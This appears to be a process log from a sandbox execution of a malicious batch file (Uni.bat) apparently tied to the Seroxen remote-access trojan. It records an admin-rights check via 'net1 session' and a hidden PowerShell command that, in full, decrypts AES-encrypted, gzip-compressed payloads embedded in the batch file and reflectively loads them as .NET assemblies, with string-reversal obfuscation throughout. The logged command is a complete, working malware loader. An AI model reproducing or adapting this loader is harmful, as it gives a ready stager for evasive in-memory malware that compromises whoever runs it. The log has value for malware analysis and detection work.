cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "XlbEBpLSkcrGBoyr" C:\Users\test22\AppData\Local\Temp\Uni.bat
2564net1.exe C:\Windows\system32\net1 session
2816Uni.bat.exe "Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function azRwn($ZgqWl){ $MAddy=[System.Security.Cryptography.Aes]::Create(); $MAddy.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MAddy.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MAddy.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('w9Ep5J7oHD6Fbsg56YkKj4grr72VpT0TPOCZ/FFwa7s='); $MAddy.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Ac7j1waEURTJBtJbjCK9A=='); $Fyduq=$MAddy.CreateDecryptor(); $return_var=$Fyduq.TransformFinalBlock($ZgqWl, 0, $ZgqWl.Length); $Fyduq.Dispose(); $MAddy.Dispose(); $return_var;}function ePOSe($ZgqWl){ $JAfiU=New-Object System.IO.MemoryStream(,$ZgqWl); $hlOZF=New-Object System.IO.MemoryStream; $dHLpk=New-Object System.IO.Compression.GZipStream($JAfiU, [IO.Compression.CompressionMode]::Decompress); $dHLpk.CopyTo($hlOZF); $dHLpk.Dispose(); $JAfiU.Dispose(); $hlOZF.Dispose(); $hlOZF.ToArray();}function lVjAe($ZgqWl,$ZCmrn){ $uuDUT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$ZgqWl); $mWBOg=$uuDUT.EntryPoint; $mWBOg.Invoke($null, $ZCmrn);}$AjtuR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($ciySa in $AjtuR) { if ($ciySa.StartsWith('SEROXEN')) { $xGGIW=$ciySa.Substring(7); break; }}$MYqcU=[string[]]$xGGIW.Split('\');$bVRNG=ePOSe (azRwn ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($MYqcU[0])));$BuubI=ePOSe (azRwn ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($MYqcU[1])));lVjAe $BuubI (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));lVjAe $bVRNG (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
2908